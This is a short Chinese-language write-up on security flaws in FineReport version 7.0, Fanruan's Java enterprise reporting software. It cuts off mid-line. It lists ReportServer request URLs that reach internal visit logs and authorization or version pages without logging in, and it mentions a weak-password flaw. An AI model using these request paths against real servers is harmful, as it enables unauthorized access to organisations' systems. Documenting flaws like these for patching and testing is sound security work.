一、帆软数据决策系统漏洞背景
FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件。主要针对2012年7.0版本存在一些安全漏洞问题。
二、帆软数据决策系统漏洞版本查看
弱口令漏洞提供了访问此页面方法
三、帆软数据决策系统漏洞漏洞总结
1.未授权访问漏洞
http://ip/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false //未授权访问内网ip的日志
http://ip/ReportServer?op=fr_server&cmd=sc_version_info&showtoolbar=false //未授权访问重置授权
http://ip/ReportServer?op=fr_server&cmd=sc_g